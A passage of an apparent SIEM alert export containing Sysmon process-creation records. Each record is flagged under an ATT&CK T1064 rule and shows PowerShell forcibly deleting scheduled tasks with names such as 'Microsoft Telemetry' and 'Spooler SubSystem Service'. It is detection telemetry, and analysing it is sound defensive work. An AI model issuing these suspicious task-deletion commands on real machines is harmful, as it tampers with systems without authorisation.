Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.522",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.366 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001072b72b00} +ProcessId: 6180 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.369456500Z"",""eventRecordID"":""3297"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.366\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001072b72b00}\r\nProcessId: 6180\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.366"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001072b72b00}"",""processId"":""6180"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.506",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.240 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001031b52b00} +ProcessId: 4772 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.242883700Z"",""eventRecordID"":""3296"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.240\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001031b52b00}\r\nProcessId: 4772\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.240"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001031b52b00}"",""processId"":""4772"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.473",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.212 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00102ab32b00} +ProcessId: 8008 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.214632600Z"",""eventRecordID"":""3295"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.212\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00102ab32b00}\r\nProcessId: 8008\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.212"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00102ab32b00}"",""processId"":""8008"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.451",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.184 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001004b12b00} +ProcessId: 6200 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.186982400Z"",""eventRecordID"":""3294"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.184\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001004b12b00}\r\nProcessId: 6200\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.184"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001004b12b00}"",""processId"":""6200"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.430",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.157 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001003af2b00} +ProcessId: 7488 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.162076300Z"",""eventRecordID"":""3293"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.157\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001003af2b00}\r\nProcessId: 7488\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.157"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001003af2b00}"",""processId"":""7488"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.408",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.127 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001035ad2b00} +ProcessId: 1520 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.129795300Z"",""eventRecordID"":""3292"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.127\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001035ad2b00}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.127"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001035ad2b00}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 